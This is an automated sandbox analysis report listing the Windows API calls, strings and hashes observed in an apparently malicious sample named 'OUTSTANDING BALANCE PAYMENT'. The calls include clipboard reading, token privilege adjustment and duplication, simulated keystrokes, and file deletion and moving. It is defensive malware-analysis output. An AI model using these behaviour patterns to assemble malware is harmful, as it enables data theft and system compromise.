                                                          • Instruction Fuzzy Hash: A4E0C2366002245BC711A698CC86FFA77EDDF886A0F0901B5F909EB254DEA4AD819691
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 016B62D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2035330255.00000000016B4000.00000040.00000020.00020000.00000000.sdmp, Offset: 016B4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16b4000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: 9ae16f960324f3823a19cadbaa3cc6a1b10d53c7a377b6b8302f6af13c0f0434
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: 15E0E67594010EDFDB00DFB4D9496DD7BB4EF04301F104161FD01D2281DA709D508A62
                                                          APIs
                                                            • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00BCF87D
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BCF8DC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BCF919
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BCF940
                                                          • SendMessageW.USER32 ref: 00BCF966
                                                          • _wcsncpy.LIBCMT ref: 00BCF9D2
                                                          • GetKeyState.USER32(00000011), ref: 00BCF9F3
                                                          • GetKeyState.USER32(00000009), ref: 00BCFA00
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BCFA16
                                                          • GetKeyState.USER32(00000010), ref: 00BCFA20
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BCFA4F
                                                          • SendMessageW.USER32 ref: 00BCFA72
                                                          • SendMessageW.USER32(?,00001030,?,00BCE059), ref: 00BCFB6F
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00BCFB85
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BCFB96
                                                          • SetCapture.USER32(?), ref: 00BCFB9F
                                                          • ClientToScreen.USER32(?,?), ref: 00BCFC03
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BCFC0F
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00BCFC29
                                                          • ReleaseCapture.USER32 ref: 00BCFC34
                                                          • GetCursorPos.USER32(?), ref: 00BCFC69
                                                          • ScreenToClient.USER32(?,?), ref: 00BCFC76
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BCFCD8
                                                          • SendMessageW.USER32 ref: 00BCFD02
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BCFD41
                                                          • SendMessageW.USER32 ref: 00BCFD6C
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BCFD84
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BCFD8F
                                                          • GetCursorPos.USER32(?), ref: 00BCFDB0
                                                          • ScreenToClient.USER32(?,?), ref: 00BCFDBD
                                                          • GetParent.USER32(?), ref: 00BCFDD9
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BCFE3F
                                                          • SendMessageW.USER32 ref: 00BCFE6F
                                                          • ClientToScreen.USER32(?,?), ref: 00BCFEC5
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BCFEF1
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BCFF19
                                                          • SendMessageW.USER32 ref: 00BCFF3C
                                                          • ClientToScreen.USER32(?,?), ref: 00BCFF86
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BCFFB6
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD004B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 2516578528-4164748364
                                                          • Opcode ID: 9fb2cbff531c5bc148485ae3d691ac68699eaaeac005323b61e0635ea3f648f4
                                                          • Instruction ID: a4f6a18a383b61ddc13dce76f611df4590d486bcae97abb683c853cc668869ba
                                                          • Opcode Fuzzy Hash: 9fb2cbff531c5bc148485ae3d691ac68699eaaeac005323b61e0635ea3f648f4
                                                          • Instruction Fuzzy Hash: AC329874604246EFDB20CF24C884FAABBE6FB49354F1806AEFA95872A1C771DC05CB51
                                                          APIs
                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00BCB1CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: %d/%02d/%02d
                                                          • API String ID: 3850602802-328681919
                                                          • Opcode ID: d38fb94b0831514415893eb0be5bcc8ed8afa4a6c5a3f432a9230683e5c0f8d4
                                                          • Instruction ID: 49033d2accf0f6c3398f3b80474a12eecda2c30830dd994cf35c4d609d02e825
                                                          • Opcode Fuzzy Hash: d38fb94b0831514415893eb0be5bcc8ed8afa4a6c5a3f432a9230683e5c0f8d4
                                                          • Instruction Fuzzy Hash: DF12BC71600248AFEB259F64CC8AFAE7BF8EF45714F1441ADF919EB290DBB08941CB51
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,00000000), ref: 00B7EB4A
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD3AEA
                                                          • IsIconic.USER32(000000FF), ref: 00BD3AF3
                                                          • ShowWindow.USER32(000000FF,00000009), ref: 00BD3B00
                                                          • SetForegroundWindow.USER32(000000FF), ref: 00BD3B0A
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BD3B20
                                                          • GetCurrentThreadId.KERNEL32 ref: 00BD3B27
                                                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00BD3B33
                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00BD3B44
                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00BD3B4C
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00BD3B54
                                                          • SetForegroundWindow.USER32(000000FF), ref: 00BD3B57
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B6C
                                                          • keybd_event.USER32(00000012,00000000), ref: 00BD3B77
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B81
                                                          • keybd_event.USER32(00000012,00000000), ref: 00BD3B86
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B8F
                                                          • keybd_event.USER32(00000012,00000000), ref: 00BD3B94
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B9E
                                                          • keybd_event.USER32(00000012,00000000), ref: 00BD3BA3
                                                          • SetForegroundWindow.USER32(000000FF), ref: 00BD3BA6
                                                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00BD3BCD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: a93c22246e27ecf47a7267f26ba4dbce8f924c8bdd118ffbc04d97914b45bc65
                                                          • Instruction ID: 7d8a0c94841165705e52374f6205162c9bb3579fcac00390b7e9687ead8619bb
                                                          • Opcode Fuzzy Hash: a93c22246e27ecf47a7267f26ba4dbce8f924c8bdd118ffbc04d97914b45bc65
                                                          • Instruction Fuzzy Hash: 02318371A403587FEB205B658C89F7F7EACEB44B50F104066FA05EB2D1DAF15D00AAA1
                                                          APIs
                                                            • Part of subcall function 00B9B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9B180
                                                            • Part of subcall function 00B9B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B9B1AD
                                                            • Part of subcall function 00B9B134: GetLastError.KERNEL32 ref: 00B9B1BA
                                                          • _memset.LIBCMT ref: 00B9AD08
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B9AD5A
                                                          • CloseHandle.KERNEL32(?), ref: 00B9AD6B
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B9AD82
                                                          • GetProcessWindowStation.USER32 ref: 00B9AD9B
                                                          • SetProcessWindowStation.USER32(00000000), ref: 00B9ADA5
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B9ADBF
                                                            • Part of subcall function 00B9AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B9ACC0), ref: 00B9AB99
                                                            • Part of subcall function 00B9AB84: CloseHandle.KERNEL32(?,?,00B9ACC0), ref: 00B9ABAB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                          • String ID: $default$winsta0
                                                          • API String ID: 2063423040-1027155976
                                                          • Opcode ID: b6f9e267c75e296d5a7f64bb0c13974c70dccc7a02b05f363372e0ebc10d7557
                                                          • Instruction ID: a3dad2f4c8354905c0269fe348cad7c1b34152a8d9444713054c5c1fee629e20
                                                          • Opcode Fuzzy Hash: b6f9e267c75e296d5a7f64bb0c13974c70dccc7a02b05f363372e0ebc10d7557
                                                          • Instruction Fuzzy Hash: AB81AE71900249AFDF11DFA4DC85AEEBBB9FF04304F2441A9F814A7161DB718E54DBA1
                                                          APIs
                                                            • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BA5FA6,?), ref: 00BA6ED8
                                                            • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BA5FA6,?), ref: 00BA6EF1
                                                            • Part of subcall function 00BA725E: __wsplitpath.LIBCMT ref: 00BA727B
                                                            • Part of subcall function 00BA725E: __wsplitpath.LIBCMT ref: 00BA728E
                                                            • Part of subcall function 00BA72CB: GetFileAttributesW.KERNEL32(?,00BA6019), ref: 00BA72CC
                                                          • _wcscat.LIBCMT ref: 00BA6149
                                                          • _wcscat.LIBCMT ref: 00BA6167
                                                          • __wsplitpath.LIBCMT ref: 00BA618E
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00BA61A4
                                                          • _wcscpy.LIBCMT ref: 00BA6209
                                                          • _wcscat.LIBCMT ref: 00BA621C
                                                          • _wcscat.LIBCMT ref: 00BA622F
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00BA625D
                                                          • DeleteFileW.KERNEL32(?), ref: 00BA626E
                                                          • MoveFileW.KERNEL32(?,?), ref: 00BA6289
                                                          • MoveFileW.KERNEL32(?,?), ref: 00BA6298
                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 00BA62AD
                                                          • DeleteFileW.KERNEL32(?), ref: 00BA62BE
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BA62E1
                                                          • FindClose.KERNEL32(00000000), ref: 00BA62FD
                                                          • FindClose.KERNEL32(00000000), ref: 00BA630B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1917200108-1173974218
                                                          • Opcode ID: a5511be55b630da0a7453cba63871d19c2acd932e1d4b6c9fe4fd7c551dab842
                                                          • Instruction ID: 95af64256169a5a7254ec29deeab4ae536d8d91651ab9a300ad389a20c76143c
                                                          • Opcode Fuzzy Hash: a5511be55b630da0a7453cba63871d19c2acd932e1d4b6c9fe4fd7c551dab842
                                                          • Instruction Fuzzy Hash: 5F5100B280C25C6ACB21EB95CC84EEB77FCAF05300F0905E6E545E3141DE769B498F94
                                                          APIs
                                                          • OpenClipboard.USER32(00BFDC00), ref: 00BB6B36
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00BB6B44
                                                          • GetClipboardData.USER32(0000000D), ref: 00BB6B4C
                                                          • CloseClipboard.USER32 ref: 00BB6B58
                                                          • GlobalLock.KERNEL32(00000000), ref: 00BB6B74
                                                          • CloseClipboard.USER32 ref: 00BB6B7E
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00BB6B93
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00BB6BA0
                                                          • GetClipboardData.USER32(00000001), ref: 00BB6BA8
                                                          • GlobalLock.KERNEL32(00000000), ref: 00BB6BB5
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00BB6BE9
                                                          • CloseClipboard.USER32 ref: 00BB6CF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          • Opcode ID: 6173a1b300d9987a911fdf078f36c7e73fa509ec01540e840091e83b5489383a
                                                          • Instruction ID: 5fcafcf4b11c143b76800dff9b7d35d70b315751a31afc0a252d2b6f49ff1f2d
                                                          • Opcode Fuzzy Hash: 6173a1b300d9987a911fdf078f36c7e73fa509ec01540e840091e83b5489383a
                                                          • Instruction Fuzzy Hash: 80517D71204241AFD310AB64DD96FBE7BF8EB94B00F040569F686DB1D1DFB8DD098A62
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00BAF62B
                                                          • FindClose.KERNEL32(00000000), ref: 00BAF67F
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BAF6A4
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BAF6BB
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BAF6E2
                                                          • __swprintf.LIBCMT ref: 00BAF72E
                                                          • __swprintf.LIBCMT ref: 00BAF767
                                                          • __swprintf.LIBCMT ref: 00BAF7BB
                                                            • Part of subcall function 00B8172B: __woutput_l.LIBCMT ref: 00B81784
                                                          • __swprintf.LIBCMT ref: 00BAF809
                                                          • __swprintf.LIBCMT ref: 00BAF858
                                                          • __swprintf.LIBCMT ref: 00BAF8A7
                                                          • __swprintf.LIBCMT ref: 00BAF8F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 835046349-2428617273
                                                          • Opcode ID: ea23cda50cc844a9fb81a8db2b715dafd97ba1b854372a92ea473b8e2f7c3a68
                                                          • Instruction ID: 29c18b6676c035335216c34482a48bcc11d40f590b6f7ce5c6598de7da9ca1e3
                                                          • Opcode Fuzzy Hash: ea23cda50cc844a9fb81a8db2b715dafd97ba1b854372a92ea473b8e2f7c3a68
                                                          • Instruction Fuzzy Hash: B4A10CB2508345ABC310EBA4C885DBFB7ECEF98704F444C6EB69587151EB34DA49CB62
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BB1B50
                                                          • _wcscmp.LIBCMT ref: 00BB1B65
                                                          • _wcscmp.LIBCMT ref: 00BB1B7C
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00BB1B8E
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00BB1BA8
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00BB1BC0
                                                          • FindClose.KERNEL32(00000000), ref: 00BB1BCB
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00BB1BE7
                                                          • _wcscmp.LIBCMT ref: 00BB1C0E
                                                          • _wcscmp.LIBCMT ref: 00BB1C25
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB1C37
                                                          • SetCurrentDirectoryW.KERNEL32(00C139FC), ref: 00BB1C55
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB1C5F
                                                          • FindClose.KERNEL32(00000000), ref: 00BB1C6C
                                                          • FindClose.KERNEL32(00000000), ref: 00BB1C7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1803514871-438819550
                                                          • Opcode ID: 54c9c5d947cf8bb879103a031f8e1eb08c344fda9720f1309efb00390a874a9f
                                                          • Instruction ID: 464b60b4d5ffcab802eff19c8ee30401de147d96d5f251d15e9d09dafc97720f
                                                          • Opcode Fuzzy Hash: 54c9c5d947cf8bb879103a031f8e1eb08c344fda9720f1309efb00390a874a9f
                                                          • Instruction Fuzzy Hash: 3631B6315012596FDF20EFA8DC99AEE7BECEF05310F5049D5E911E7090EBB0DE858A64
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BB1CAB
                                                          • _wcscmp.LIBCMT ref: 00BB1CC0
                                                          • _wcscmp.LIBCMT ref: 00BB1CD7
                                                            • Part of subcall function 00BA6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BA6BEF
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00BB1D06
                                                          • FindClose.KERNEL32(00000000), ref: 00BB1D11
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00BB1D2D
                                                          • _wcscmp.LIBCMT ref: 00BB1D54
                                                          • _wcscmp.LIBCMT ref: 00BB1D6B
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB1D7D
                                                          • SetCurrentDirectoryW.KERNEL32(00C139FC), ref: 00BB1D9B
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB1DA5
                                                          • FindClose.KERNEL32(00000000), ref: 00BB1DB2
                                                          • FindClose.KERNEL32(00000000), ref: 00BB1DC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 1824444939-438819550
                                                          • Opcode ID: 90292b50250f4f6c090b6fdbc141758ae4f8d4c3b93c89e70879e15ca4cecacb
                                                          • Instruction ID: 5010bcd8d5f669f3dbb0b02144ab12541a30d498324fa298799830da1931ee92
                                                          • Opcode Fuzzy Hash: 90292b50250f4f6c090b6fdbc141758ae4f8d4c3b93c89e70879e15ca4cecacb
                                                          • Instruction Fuzzy Hash: BF31F43250165A6BCF10EFA8DC59AEE37EDDF05324F5049E1E901A70A0DBB0DE85CB64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _memset
                                                          • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                          • API String ID: 2102423945-2023335898
                                                          • Opcode ID: 9e296ae24dceb627a7454ea218b077095307a2dcb3a7eaf159e171784290ec75
                                                          • Instruction ID: 8a987d2f8e6ec86222711baf2ed6104b018c9aa0ec70a7723f4f5eeaaf07cc73
                                                          • Opcode Fuzzy Hash: 9e296ae24dceb627a7454ea218b077095307a2dcb3a7eaf159e171784290ec75
                                                          • Instruction Fuzzy Hash: 71829071D0421ADBCB24CF94C8806ADBBF1FF48314F2581EAD85AAB351E7789D85DB90
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 00BB09DF
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB09EF
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BB09FB
                                                          • __wsplitpath.LIBCMT ref: 00BB0A59
                                                          • _wcscat.LIBCMT ref: 00BB0A71
                                                          • _wcscat.LIBCMT ref: 00BB0A83
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB0A98
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0AAC
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0ADE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0AFF
                                                          • _wcscpy.LIBCMT ref: 00BB0B0B
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BB0B4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
